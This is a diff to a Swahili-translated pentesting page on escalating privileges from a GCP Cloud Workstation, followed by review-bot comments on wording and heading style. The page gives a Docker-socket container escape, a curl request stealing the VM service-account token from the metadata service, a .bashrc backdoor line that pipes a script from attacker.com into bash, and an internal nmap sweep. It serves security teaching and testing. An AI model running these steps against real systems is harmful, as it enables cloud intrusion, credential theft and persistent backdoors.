diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index 370e7e8ba..fe069ffbf 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md 
@@ -1,18 +1,19 @@ # GCP - Cloud Workstations Privesc +{{#include ../../../banners/hacktricks-training.md}} ### Container Breakout via Docker Socket (Container -> VM -> Project) -Njia kuu ya privilege escalation katika Cloud Workstations inatokana na hitaji la kuunga mkono workflows za **Docker-in-Docker (DinD)** kwa waendelezaji. Wakati usanidi wa workstation unachomeka Docker socket au kuruhusu privileged containers (usanidi wa kawaida), mshambuliaji ndani ya workstation container anaweza kutoroka hadi Compute Engine VM inayokaa chini na kuiba token ya service account yake. +Njia kuu ya privilege escalation katika Cloud Workstations inatokana na hitaji la kuunga mkono workflows za **Docker-in-Docker (DinD)** kwa watengenezaji. Wakati usanidi wa workstation una-mount Docker socket au unaruhusu privileged containers (usanidi wa kawaida), mshambulizi ndani ya workstation container anaweza kutoroka hadi Compute Engine VM ya msingi na kuiba token ya service account. -**Prerequisites:** -- Ufikiaji wa terminal ya Cloud Workstation (kupitia SSH, session iliyoathiriwa, au credentials zilizoporwa) -- Usanidi wa workstation lazima uchomeke `/var/run/docker.sock` au kuruhusu privileged containers +**Mahitaji:** +- Ufikiaji wa terminal ya Cloud Workstation (kwa kupitia SSH, session iliyovamiwa, au credentials zilizoporwa) +- Usanidi wa workstation lazima u-mount `/var/run/docker.sock` au kuwezesha privileged containers -**Architecture context:** Workstation ni container (Layer 3) inayokimbia kwenye Docker/Containerd runtime (Layer 2) kwenye GCE VM (Layer 1). Docker socket hutoa ufikiaji wa moja kwa moja kwa container runtime ya host. +**Muktadha wa usanifu:** Workstation ni container (Layer 3) inayokimbia kwenye Docker/Containerd runtime (Layer 2) kwenye GCE VM (Layer 1). Docker socket hutoa ufikiaji wa moja kwa moja kwa host's container runtime. 
> [!NOTE] -> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) inaotomatisha full container escape na inakupeleka kwenye root shell kwenye host VM. +> Zana [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) inafanikisha container escape kamili na inakupeleka kwenye root shell kwenye host VM.
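Review bot: the rewritten "Njia kuu ya privilege escalation" paragraph drops "yake" from "token ya service account yake", so the sentence no longer says whose token is stolen; the "Muktadha wa usanifu" line a few lines below still states it is the VM's service account, so suggest "kuiba token ya service account ya VM" to keep the two consistent. Two smaller points in the same hunk: "kwa kupitia SSH" in the "Mahitaji" list is redundant (the old "kupitia SSH" was correct), and the new "Muktadha wa usanifu" sentence ends with the English possessive "host's container runtime" inside a Swahili clause, where the original "container runtime ya host" read naturally.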
@@ -26,9 +27,9 @@ ls -l /var/run/docker.sock
-Hatua 2: Kutoroka kwenye mfumo wa faili wa VM ya mwenyeji +Hatua ya 2: Escape to the host VM filesystem -Tunazindua privileged container, tukimount root directory ya host hadi `/mnt/host`. Pia tunashare network na PID namespace za host ili kuongeza uonekano. +Tunazindua privileged container, tukimount host's root directory kwa `/mnt/host`. Pia tunashare host's network na PID namespace ili kuongeza visibility. ```bash # Spawn a privileged container mounting the host's root filesystem docker run -it --rm --privileged --net=host --pid=host \ @@ -44,7 +45,7 @@ Sasa una **root shell on the underlying Compute Engine VM** (Layer 1).
-Hatua 3: Iba token ya service account ya VM kutoka IMDS +Hatua ya 3: Nyang'anya token ya service account ya VM kutoka IMDS ```bash # From the host VM, query the Instance Metadata Service curl -s -H "Metadata-Flavor: Google" \ @@ -61,16 +62,16 @@ http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scop
> [!CAUTION] -> **Kagua access scopes!** -> Hata kama Service Account iliyounganishwa ni **Editor**, VM inaweza kuwa imezuiwa na access scopes. -> Ikiwa unaona `https://www.googleapis.com/auth/cloud-platform`, una ruhusa kamili. -> Ikiwa unaona tu `logging.write` na `monitoring.write`, umezuiliwa kwa vector za **Network Pivot** na **Persistence** hapa chini. +> **Angalia Scopes!** +> Hata kama Service Account iliyounganishwa ni **Editor**, VM inaweza kuwa na vikwazo kwa sababu ya access scopes. +> Ikiwa unaona `https://www.googleapis.com/auth/cloud-platform`, una access kamili. +> Ikiwa unaona tu `logging.write` na `monitoring.write`, umezuiliwa kwa vectors za **Network Pivot** na **Persistence** hapa chini.
Step 4: Achieve Persistence (Backdoor the User) -Cloud Workstations zinaambatisha diski ya kudumu kwenye `/home/user`. Kwa sababu container user (kawaida `user`, UID 1000) anafanana na host user (UID 1000), unaweza kuandika kwenye home directory ya host. Hii inakuwezesha kuweka backdoor katika environment hata kama workstation container itajengwa upya. +Cloud Workstations zinapakia diski ya kudumu kwenye `/home/user`. Kwa sababu container user (kawaida `user`, UID 1000) inafanana na host user (UID 1000), unaweza kuandika kwenye katalogi ya nyumbani ya host. Hii inakuwezesha backdoor the environment hata kama workstation container itajengwa upya. ```bash # Check if you can write to the host's persistent home ls -la /mnt/host/home/user/ @@ -85,7 +86,7 @@ echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc Hatua 5: Network Pivot (Internal VPC Access) -Kwa kuwa unashiriki host network namespace (`--net=host`), sasa uko kama trusted node kwenye VPC. Unaweza scan internal services zinazoruhusu access kwa msingi wa IP whitelisting. +Kwa kuwa unashiriki host network namespace (`--net=host`), sasa wewe ni node ya kuaminika kwenye VPC. Unaweza kufanya scan kwa internal services zinazoruhusu access kulingana na IP whitelisting. ```bash # Install scanning tools on the host (if internet access allows) apk add nmap @@ -94,3 +95,7 @@ apk add nmap nmap -sS -p 80,443,22 10.0.0.0/8 ```
+ + + +{{#include ../../../banners/hacktricks-training.md}}
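Review bot: in hunk `@@ -26,9 +27,9 @@` the heading is changed from Swahili ("Hatua 2: Kutoroka kwenye mfumo wa faili wa VA ya mwenyeji") to a mixed "Hatua ya 2: Escape to the host VM filesystem", while the other step headings in this patch ("Hatua ya 3: Nyang'anya token ...") stay in Swahili; keep the heading text in Swahili, e.g. "Hatua ya 2: Kutoroka kwenye mfumo wa faili wa VM mwenyeji". The following sentence likewise replaces "root directory ya host" with the English possessive "host's root directory"; the earlier wording was the more idiomatic one.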
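Review bot: in hunk `@@ -61,16 +62,16 @@` the caution title "Kagua access scopes!" becomes "Angalia Scopes!", losing the word "access" even though the next line still talks about "access scopes"; suggest "Angalia access scopes!" so the title names the same thing as the body. In the same hunk, "inakuwezesha backdoor the environment" splices an English verb phrase into a Swahili sentence, whereas the removed line "inakuwezesha kuweka backdoor katika environment" was grammatical; and the unchanged context heading "Step 4: Achieve Persistence (Backdoor the User)" is the only step heading on the page still entirely in English, so it should be translated to the "Hatua ya N" form used by the others.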
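Review bot: in hunk `@@ -85,7 +86,7 @@` the context heading reads "Hatua 5: Network Pivot (Internal VPC Access)" while this patch changes the other headings to the "Hatua ya 2" / "Hatua ya 3" form; for consistency it should become "Hatua ya 5: ..." in the same change.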
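Review bot: hunk `@@ -94,3 +95,7 @@` appends three blank lines before the closing `{{#include ../../../banners/hacktricks-training.md}}`; one blank line after the closing code fence is enough, and the extra ones will render as trailing whitespace. The include path matches the one added at the top of the file in the first hunk, so the banner pair itself looks correct.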